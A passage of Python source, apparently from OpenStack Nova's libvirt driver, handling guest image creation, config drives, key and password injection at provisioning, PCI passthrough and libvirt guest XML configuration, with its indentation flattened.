def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
# NOTE(rmk): We had Spice consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='spice')
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
if not hasattr(os, 'O_DIRECT'):
LOG.debug(_("This python runtime does not support direct I/O"))
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
os.close(f)
LOG.debug(_("Path '%(path)s' supports direct I/O") %
{'path': dirpath})
except OSError as e:
if e.errno == errno.EINVAL:
LOG.debug(_("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'") %
{'path': dirpath, 'ex': str(e)})
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
def _create_ephemeral(self, target, ephemeral_size,
fs_label, os_type, is_block_dev=False):
if not is_block_dev:
self._create_local(target, ephemeral_size)
# Run as root only for block devices.
disk.mkfs(os_type, fs_label, target, run_as_root=is_block_dev)
@staticmethod
def _create_swap(target, swap_mb):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _create_image(self, context, instance,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None,
admin_pass=None, inject_files=True):
if not suffix:
suffix = ''
booted_from_volume = (
(not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping
)
# syntactic nicety
def basepath(fname='', suffix=suffix):
return os.path.join(libvirt_utils.get_instance_path(instance),
fname + suffix)
def image(fname, image_type=CONF.libvirt_images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
# ensure directories exist and are writable
fileutils.ensure_tree(basepath(suffix=''))
LOG.info(_('Creating image'), instance=instance)
# NOTE(dprince): for rescue, console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
# NOTE(vish): No need to add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 7)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = flavors.extract_flavor(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * unit.Gi
if size == 0 or suffix == '.rescue':
size = None
image('disk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = instance['os_type']
if not os_type_with_default:
os_type_with_default = 'default'
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
disk_image = image('disk.local')
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * unit.Gi
disk_image.cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for idx, eph in enumerate(driver.block_device_info_get_ephemerals(
block_device_info)):
disk_image = image(blockinfo.get_eph_disk(idx))
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % idx,
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
size = eph['size'] * unit.Gi
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
disk_image.cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'])
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * unit.Mi
image('disk.swap').cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md, network_info=network_info)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = basepath(fname='disk.config')
LOG.info(_('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Creating config drive failed '
'with error: %s'),
e, instance=instance)
# File injection only if needed
elif inject_files and CONF.libvirt_inject_partition != -2:
if booted_from_volume:
LOG.warn(_('File injection into a boot from volume '
'instance is not supported'), instance=instance)
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt_inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt_type == 'lxc':
target_partition = None
if CONF.libvirt_inject_key and instance['key_data']:
key = str(instance['key_data'])
else:
key = None
net = netutils.get_injected_network_template(network_info)
metadata = instance.get('metadata')
if not CONF.libvirt_inject_password:
admin_pass = None
if any((key, net, metadata, admin_pass, files)):
# If we're not using config_drive, inject into root fs
injection_path = image('disk').path
img_id = instance['image_ref']
for inj, val in [('key', key),
('net', net),
('metadata', metadata),
('admin_pass', admin_pass),
('files', files)]:
if val:
LOG.info(_('Injecting %(inj)s into image '
'%(img_id)s'),
{'inj': inj, 'img_id': img_id},
instance=instance)
try:
disk.inject_data(injection_path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Error injecting data into image '
'%(img_id)s (%(e)s)'),
{'img_id': img_id, 'e': e},
instance=instance)
if CONF.libvirt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def _prepare_pci_devices_for_use(self, pci_devices):
# kvm and qemu support managed mode
# In managed mode, the configured device will be automatically
# detached from the host OS drivers when the guest is started,
# and then re-attached when the guest shuts down.
if CONF.libvirt_type != 'xen':
# we do manual detach only for xen
return
try:
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
# Note(yjiang5) Spelling for 'dettach' is correct, see
# http://libvirt.org/html/libvirt-libvirt.html.
libvirt_dev.dettach()
# Note(yjiang5): A reset of one PCI device may impact other
# devices on the same bus, thus we need two separated loops
# to detach and then reset it.
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
libvirt_dev.reset()
except libvirt.libvirtError as exc:
raise exception.PciDevicePrepareFailed(id=dev['id'],
instance_uuid=
dev['instance_uuid'],
reason=str(exc))
def _detach_pci_devices(self, dom, pci_devs):
# For libvirt versions < 1.1.1 this is racy, so forbid detaching
# PCI devices unless we have at least that version.
if not self.has_min_version(MIN_LIBVIRT_DEVICE_CALLBACK_VERSION):
if pci_devs:
reason = (_("Detaching PCI devices with libvirt < %(ver)s"
" is not permitted") %
{'ver': MIN_LIBVIRT_DEVICE_CALLBACK_VERSION})
raise exception.PciDeviceDetachFailed(reason=reason,
dev=pci_devs)
try:
for dev in pci_devs:
dom.detachDeviceFlags(self.get_guest_pci_device(dev).to_xml(),
libvirt.VIR_DOMAIN_AFFECT_LIVE)
# after detachDeviceFlags returned, we should check the dom to
# ensure the detaching is finished
xml = dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
guest_config = vconfig.LibvirtConfigGuest()
guest_config.parse_dom(xml_doc)
for hdev in [d for d in guest_config.devices
if d.type == 'pci']:
hdbsf = [hdev.domain, hdev.bus, hdev.slot, hdev.function]
dbsf = pci_utils.parse_address(dev['address'])
if [int(x, 16) for x in hdbsf] ==\
[int(x, 16) for x in dbsf]:
raise exception.PciDeviceDetachFailed(reason=
"timeout",
dev=dev)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_("Instance disappeared while detaching "
"a PCI device from it."))
else:
raise
def _attach_pci_devices(self, dom, pci_devs):
try:
for dev in pci_devs:
dom.attachDevice(self.get_guest_pci_device(dev).to_xml())
except libvirt.libvirtError:
LOG.error(_('Attaching PCI devices %(dev)s to %(dom)s failed.')
% {'dev': pci_devs, 'dom': dom.ID()})
raise
def set_host_enabled(self, host, enabled):
"""Sets the specified host's ability to accept new instances."""
status_name = {True: 'Enabled',
False: 'Disabled'}
if isinstance(enabled, bool):
disable_service = not enabled
disable_reason = ''
else:
disable_service = bool(enabled)
disable_reason = enabled
ctx = nova_context.get_admin_context()
try:
service = service_obj.Service.get_by_compute_host(ctx, CONF.host)
if service.disabled != disable_service:
service.disabled = disable_service
service.disabled_reason = disable_reason
service.save()
LOG.debug(_('Updating compute service status to: %s'),
status_name[disable_service])
except exception.ComputeHostNotFound:
LOG.warn(_('Cannot update service status on host: %s, '
'since it is not registered.') % CONF.host)
except Exception:
LOG.warn(_('Cannot update service status on host: %s, '
'due to an unexpected exception.') % CONF.host,
exc_info=True)
def get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
try:
features = self._conn.baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
self._caps.host.cpu = vconfig.LibvirtConfigCPU()
self._caps.host.cpu.parse_str(features)
except libvirt.libvirtError as ex:
# VIR_ERR_NO_SUPPORT is an error code rather than an exception
# class, so catch libvirtError and ignore only that case.
if ex.get_error_code() != libvirt.VIR_ERR_NO_SUPPORT:
raise
return self._caps
def get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self.get_host_capabilities()
return caps.host.uuid
def get_host_cpu_for_guest(self):
"""Returns an instance of config.LibvirtConfigGuestCPU
representing the host's CPU model & topology with
policy for configuring a guest to match
"""
caps = self.get_host_capabilities()
hostcpu = caps.host.cpu
guestcpu = vconfig.LibvirtConfigGuestCPU()
guestcpu.model = hostcpu.model
guestcpu.vendor = hostcpu.vendor
guestcpu.arch = hostcpu.arch
guestcpu.match = "exact"
for hostfeat in hostcpu.features:
guestfeat = vconfig.LibvirtConfigGuestCPUFeature(hostfeat.name)
guestfeat.policy = "require"
guestcpu.features.append(guestfeat)
return guestcpu
def get_guest_cpu_config(self):
mode = CONF.libvirt_cpu_mode
model = CONF.libvirt_cpu_model
if mode is None:
if CONF.libvirt_type == "kvm" or CONF.libvirt_type == "qemu":
mode = "host-model"
else:
mode = "none"
if mode == "none":
return None
if CONF.libvirt_type != "kvm" and CONF.libvirt_type != "qemu":
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug(_("CPU mode '%(mode)s' model '%(model)s' was chosen")
% {'mode': mode, 'model': (model or "")})
# TODO(berrange): in the future, when MIN_LIBVIRT_VERSION is
# updated to be at least this new, we can kill off the elif
# blocks here
if self.has_min_version(MIN_LIBVIRT_HOST_CPU_VERSION):
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
elif mode == "custom":
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.model = model
elif mode == "host-model":
cpu = self.get_host_cpu_for_guest()
elif mode == "host-passthrough":
msg = _("Passthrough of the host CPU was requested but "
"this libvirt version does not support this feature")
raise exception.NovaException(msg)
return cpu
def get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'],
self.get_hypervisor_version())
def get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
if CONF.libvirt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self.get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self.get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_ephemeral_device':
block_device.prepend_dev(disklocal.target_dev)})
for idx, eph in enumerate(
driver.block_device_info_get_ephemerals(
block_device_info)):
diskeph = self.get_guest_disk_config(
instance,
blockinfo.get_eph_disk(idx),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self.get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_swap_device': block_device.prepend_dev(
diskswap.target_dev)})
for vol in block_device_mapping:
connection_info = vol['connection_info']
vol_dev = block_device.prepend_dev(vol['mount_device'])
info = disk_mapping[vol_dev]
cfg = self.volume_driver_method('connect_volume',
connection_info,
info)
devices.append(cfg)
if 'disk.config' in disk_mapping:
diskconfig = self.get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
'raw')
devices.append(diskconfig)
for d in devices:
self.set_cache_mode(d)
return devices
def get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self.get_host_uuid()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def get_guest_pci_device(self, pci_device):
dbsf = pci_utils.parse_address(pci_device['address'])
dev = vconfig.LibvirtConfigGuestHostdevPCI()
dev.domain, dev.bus, dev.slot, dev.function = dbsf
# only kvm and qemu support managed mode
if CONF.libvirt_type == 'xen':
dev.managed = 'no'
if CONF.libvirt_type in ('kvm', 'qemu'):
dev.managed = 'yes'
return dev
def get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
CONSOLE = "console=tty0 console=ttyS0"
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
guest.memory = inst_type['memory_mb'] * 1024
guest.vcpus = inst_type['vcpus']
guest.cpuset = CONF.vcpu_pin_set
quota_items = ['cpu_shares', 'cpu_period', 'cpu_quota']
for key, value in inst_type['extra_specs'].iteritems():
scope = key.split(':')
if len(scope) > 1 and scope[0] == 'quota':
if scope[1] in quota_items:
setattr(guest, scope[1], value)
guest.cpu = self.get_guest_cpu_config()
if 'root' in disk_mapping:
root_device_name = block_device.prepend_dev(
disk_mapping['root']['dev'])
else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'root_device_name': root_device_name})
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.xen_hvmloader_path
if CONF.libvirt_type in ("kvm", "qemu"):
caps = self.get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self.get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
guest.os_init_path = "/sbin/init"
guest.os_cmdline = CONSOLE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.XEN:
guest.os_root = root_device_name
else:
guest.os_type = vm_mode.HVM
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
else:
guest.os_boot_dev = blockinfo.get_boot_order(disk_info)
if CONF.libvirt_type != "lxc" and CONF.libvirt_type != "uml":
guest.acpi = True
guest.apic = True
# NOTE(mikal): Microsoft Windows expects the clock to be in
# "localtime". If the clock is set to UTC, then you can use a
# registry key to let windows know, but Microsoft says this is
# buggy in http://support.microsoft.com/kb/2687252
clk = vconfig.LibvirtConfigGuestClock()
if instance['os_type'] == 'windows':
LOG.info(_('Configuring timezone for windows instance to '
'localtime'), instance=instance)
clk.offset = 'localtime'
else:
clk.offset = 'utc'
guest.set_clock(clk)
if CONF.libvirt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
clk.add_timer(tmpit)
clk.add_timer(tmrtc)
for cfg in self.get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
inst_type):
guest.add_device(cfg)
for vif in network_info:
cfg = self.vif_driver.get_config(instance,
vif,
image_meta,
inst_type)
guest.add_device(cfg)
if CONF.libvirt_type == "qemu" or CONF.libvirt_type == "kvm":
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
consolepty.type = "pty"
guest.add_device(consolepty)
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
if CONF.vnc_enabled and CONF.libvirt_type not in ('lxc', 'uml'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
if CONF.spice.enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
        # The Qemu guest agent is only supported on 'qemu' and 'kvm'
        # hypervisors
if CONF.libvirt_type in ('qemu', 'kvm'):
qga_enabled = False
# Enable qga only if the 'hw_qemu_guest_agent' property is set
if (image_meta is not None and image_meta.get('properties') and
image_meta['properties'].get('hw_qemu_guest_agent')
is not None):
hw_qga = image_meta['properties']['hw_qemu_guest_agent']
if hw_qga.lower() == 'yes':
LOG.debug(_("Qemu guest agent is enabled through image "
"metadata"), instance=instance)
qga_enabled = True
if qga_enabled:
qga = vconfig.LibvirtConfigGuestChannel()
qga.type = "unix"
qga.target_name = "org.qemu.guest_agent.0"
qga.source_path = ("/var/lib/libvirt/qemu/%s.%s.sock" %
("org.qemu.guest_agent.0", instance['name']))
guest.add_device(qga)
if CONF.libvirt_type in ('xen', 'qemu', 'kvm'):
for pci_dev in pci_manager.get_instance_pci_devs(instance):
guest.add_device(self.get_guest_pci_device(pci_dev))
else:
if len(pci_manager.get_instance_pci_devs(instance)) > 0:
raise exception.PciDeviceUnsupportedHypervisor(
type=CONF.libvirt_type)
return guest
def to_xml(self, context, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
# We should get image metadata every time for generating xml
if image_meta is None:
(image_service, image_id) = glance.get_remote_image_service(
context, instance['image_ref'])
image_meta = compute_utils.get_image_metadata(
context, image_service, image_id, instance)
LOG.debug(_('Start to_xml instance=%(instance)s '
'network_info=%(network_info)s '
'disk_info=%(disk_info)s '
                    'image_meta=%(image_meta)s rescue=%(rescue)s '
'block_device_info=%(block_device_info)s'),
{'instance': instance, 'network_info': network_info,
'disk_info': disk_info, 'image_meta': image_meta,
'rescue': rescue, 'block_device_info': block_device_info})
conf = self.get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug(_('End to_xml instance=%(instance)s xml=%(xml)s'),
{'instance': instance, 'xml': xml})
return xml
def _lookup_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
(state, max_mem, mem, num_cpu, cpu_time) = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[state],
'max_mem': max_mem,
'mem': mem,
'num_cpu': num_cpu,
'cpu_time': cpu_time,
'id': virt_dom.ID()}
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0, power_on=True):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
inst_path = None
if instance:
inst_path = libvirt_utils.get_instance_path(instance)
if CONF.libvirt_type == 'lxc':
if not inst_path:
inst_path = None
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
container_root_device = disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
#Note(GuanQiang): save container root device name here, used for
# detaching the linked image device when deleting
# the lxc instance.
if container_root_device:
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'root_device_name': container_root_device})
if xml:
try:
domain = self._conn.defineXML(xml)
except Exception as e:
LOG.error(_("An error occurred while trying to define a domain"
" with xml: %s") % xml)
raise e
if power_on:
try:
domain.createWithFlags(launch_flags)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("An error occurred while trying to launch a "
"defined domain with xml: %s") %
domain.XMLDesc(0))
try:
self._enable_hairpin(domain.XMLDesc(0))
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("An error occurred while enabling hairpin mode on "
"domain with xml: %s") % domain.XMLDesc(0))
# NOTE(uni): Now the container is running with its own private mount
# namespace and so there is no need to keep the container rootfs
# mounted in the host namespace
if CONF.libvirt_type == 'lxc':
state = self.get_info(instance)['state']
container_dir = os.path.join(inst_path, 'rootfs')
if state == power_state.RUNNING:
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
return domain
def _create_domain_and_network(self, xml, instance, network_info,
block_device_info=None, power_on=True,
context=None, reboot=False):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(CONF.libvirt_type, vol)
conf = self.volume_driver_method('connect_volume',
connection_info,
disk_info)
# cache device_path in connection_info -- required by encryptors
if (not reboot and 'data' in connection_info and
'volume_id' in connection_info['data']):
connection_info['data']['device_path'] = conf.source_path
self.virtapi.block_device_mapping_update(context, vol.id,
{'connection_info': jsonutils.dumps(connection_info)})
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance, network_info)
domain = self._create_domain(xml, instance=instance, power_on=power_on)
self.firewall_driver.apply_instance_filter(instance, network_info)
return domain
def get_all_block_devices(self):
"""
Return all block devices in use on this node.
"""
devices = []
for dom_id in self.list_instance_ids():
try:
domain = self._lookup_by_id(dom_id)
doc = etree.fromstring(domain.XMLDesc(0))
except exception.InstanceNotFound:
